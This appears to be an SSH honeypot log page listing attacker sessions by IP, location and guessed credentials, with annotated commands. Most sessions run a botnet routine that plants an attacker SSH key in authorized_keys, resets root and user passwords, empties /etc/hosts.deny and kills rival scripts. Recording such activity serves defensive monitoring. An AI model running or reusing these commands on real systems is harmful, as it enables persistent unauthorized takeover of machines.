2026-05-26 19:28 EDT Β· as root/Abcd1234!, ubuntu/fjbdfdjkdsfs541544AA@@
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544AA@@\ncnLykBCnI5fe\ncnLykBCnI5fe"|passwd|bash
$ Enter new UNIX password:
$ echo "fjbdfdjkdsfs541544AA@@\ncnLykBCnI5fe\ncnLykBCnI5fe\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:LJ3vEjscwjef"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 stein_root_18 (164.90.236.107) β€” Frankfurt am Main, Germany Β· 4 sessions Β· 80 cmds
2026-05-26 19:27 EDT Β· as anand/anand, devops/devops@2025, osadmin/osadmin
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544AA@@\nSqOuwhbB9XIJ\nSqOuwhbB9XIJ"|passwd|bash
$ Enter new UNIX password: Γ—4
$ echo "fjbdfdjkdsfs541544AA@@\nSqOuwhbB9XIJ\nSqOuwhbB9XIJ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo -e "devops@2025\n64CQEiCGrNxK\n64CQEiCGrNxK"|passwd|bash
$ echo "devops@2025\n64CQEiCGrNxK\n64CQEiCGrNxK\n"|passwd
$ echo -e "anand\nGvJWppZNR6m8\nGvJWppZNR6m8"|passwd|bash
$ echo "anand\nGvJWppZNR6m8\nGvJWppZNR6m8\n"|passwd
$ echo -e "osadmin\nL3gny0AjREPL\nL3gny0AjREPL"|passwd|bash
$ echo "osadmin\nL3gny0AjREPL\nL3gny0AjREPL\n"|passwd
🎭 specter_root_11 (190.32.246.14) β€” Panama City, Panama Β· 4 sessions Β· 78 cmds
2026-05-09 01:54 EDT Β· as dino/dino, root/fjbdfdjkdsfs541544@@, root/test123test
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544AA@@\nx1KxW2zjpikg\nx1KxW2zjpikg"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "fjbdfdjkdsfs541544AA@@\nx1KxW2zjpikg\nx1KxW2zjpikg\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo -e "dino\nCkExcUHP8bP3\nCkExcUHP8bP3"|passwd|bash
$ echo "dino\nCkExcUHP8bP3\nCkExcUHP8bP3\n"|passwd
$ echo "root:vLXdzuzeUvUf"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ echo "root:wJYATlNnzlH2"|chpasswd|bash
🎭 ghost_root_7 (190.119.63.98) β€” Lima, Peru Β· 4 sessions Β· 79 cmds
2026-05-08 10:03 EDT Β· as olivier/olivier, root/toorroot, ubuntu/123qwe!!
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544AA@@\nGgagzp8x1c6e\nGgagzp8x1c6e"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "fjbdfdjkdsfs541544AA@@\nGgagzp8x1c6e\nGgagzp8x1c6e\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo "root:6jOo2S0BwhQt"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ echo -e "olivier\njGuexmeniPo5\njGuexmeniPo5"|passwd|bash
$ echo "olivier\njGuexmeniPo5\njGuexmeniPo5\n"|passwd
$ echo -e "123qwe!!\nTL8Ei6jCY3Sh\nTL8Ei6jCY3Sh"|passwd|bash
$ echo "123qwe!!\nTL8Ei6jCY3Sh\nTL8Ei6jCY3Sh\n"|passwd
🎭 panda_root_17 (14.103.127.243) β€” Haidian, China Β· 2 sessions Β· 23 cmds
2026-05-26 18:55 EDT Β· as root/rootroot01, ubuntu/fjbdfdjkdsfs541544AA@@
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544AA@@\nh96Ph5FkS1uU\nh96Ph5FkS1uU"|passwd|bash
$ Enter new UNIX password:
$ echo "fjbdfdjkdsfs541544AA@@\nh96Ph5FkS1uU\nh96Ph5FkS1uU\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lantern_root_22 (101.126.53.14) β€” Chaowai, China Β· 1 session Β· 20 cmds
2026-05-26 18:46 EDT Β· as ubuntu/fjbdfdjkdsfs541544AA@@
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "fjbdfdjkdsfs541544AA@@\nSQCEuuEgZA5r\nSQCEuuEgZA5r"|passwd|bash
$ Enter new UNIX password:
$ echo "fjbdfdjkdsfs541544AA@@\nSQCEuuEgZA5r\nSQCEuuEgZA5r\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_57 (203.116.129.55) β€” Singapore, Singapore Β· 3 sessions Β· 58 cmds
2026-05-26 16:15 EDT Β· as postgres/123456789, root/123123qq, root/admin@1
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:cIbiyA7SaqEN"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:1ZkdjaizB9gs"|chpasswd|bash
$ echo -e "123456789\nGJPwxJMW7CvG\nGJPwxJMW7CvG"|passwd|bash
$ Enter new UNIX password:
$ echo "123456789\nGJPwxJMW7CvG\nGJPwxJMW7CvG\n"|passwd
🎭 fog_root (167.160.13.146) β€” Manchester, United Kingdom Β· 1 session Β· 1 cmd
2026-05-26 16:06 EDT Β· as root/V3ryF8ck1ngF4stHASTEN1337!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ unset HISTFILE; uname -a; history -c // history snooping
🎭 wraith_root_58 (41.191.229.226) β€” Nairobi, Kenya Β· 1 session Β· 19 cmds
2026-05-26 15:49 EDT Β· as root/admin@1
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:ds9UhuZqBQgh"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_62 (103.210.21.225) β€” Hong Kong, Hong Kong Β· 3 sessions Β· 59 cmds
2026-05-25 13:59 EDT Β· as cloud/Wangsu@2017, curl/welltech12, root/qwerty123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:y1RsXEDdpFEA"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "welltech12\nUfrjKQRbCJlZ\nUfrjKQRbCJlZ"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "welltech12\nUfrjKQRbCJlZ\nUfrjKQRbCJlZ\n"|passwd
$ echo -e "Wangsu@2017\ntpjDz5aOKyYx\ntpjDz5aOKyYx"|passwd|bash
$ echo "Wangsu@2017\ntpjDz5aOKyYx\ntpjDz5aOKyYx\n"|passwd
🎭 wraith_root_59 (38.76.163.36) β€” Kwai Chung, Hong Kong Β· 1 session Β· 19 cmds
2026-05-26 15:47 EDT Β· as root/qwerty123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:kYHnq6BXAnLS"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 seoul_root_15 (211.253.31.30) β€” Seoul, South Korea Β· 1 session Β· 19 cmds
2026-05-26 15:33 EDT Β· as root/123123qq
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:2thgLfgkFS6l"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_50 (197.248.34.233) β€” Nairobi, Kenya Β· 1 session Β· 19 cmds
2026-05-26 15:32 EDT Β· as root/123123qq
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:3hUpp4S847gz"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_sol (103.98.176.164) β€” Rejosari, Indonesia Β· 5 sessions Β· 78 cmds
2026-05-18 04:52 EDT Β· as aroot/aroot, root/hermina, root/root2024@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo "root:52hvkN8Dp16c"|chpasswd|bash
